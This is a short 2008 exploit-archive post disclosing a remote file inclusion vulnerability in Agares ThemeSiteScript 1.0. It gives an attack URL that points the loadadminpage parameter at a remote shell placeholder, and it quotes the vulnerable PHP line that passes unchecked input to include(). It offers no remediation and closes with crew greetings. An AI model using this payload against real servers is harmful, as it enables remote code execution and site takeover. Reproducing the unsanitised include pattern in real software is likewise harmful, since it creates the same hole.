[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Agares ThemeSiteScript 1.0 (loadadminpage) RFI Vulnerability
# Published : 2008-10-28
# Author : DaRkLiFe
# Previous Title : PersianBB (iranian_music.php id) Remote SQL Injection Vulnerability
# Next Title : TlGuestBook 1.2 Insecure Cookie Handling Vulnerability
**************************************************************************************
Author : DaRkLiFe
Greetz : str0ke & S.W.A.T. & funkys0ul & Team 1nF3Ct3d
**************************************************************************************
Script :
ThemeSiteScript v1.0 Remote File Inclusion Vulnerability
Home Page :
http://agaresmedia.com
Download :
http://rapidshare.com/files/72501220/ThemeSiteScript_1.0_webgraf.ru.rar
**************************************************************************************
Exploit :
http://localhost/upload/admin/frontpage_right.php?loadadminpage=Sh3lLz?
**************************************************************************************
Vulnerable : line 2 : <?PHP include($loadadminpage); ?>
**************************************************************************************
THANKS ! GREETZ ! HAPPY DIWALI !
**************************************************************************************
# www.Syue.com [2008-10-28]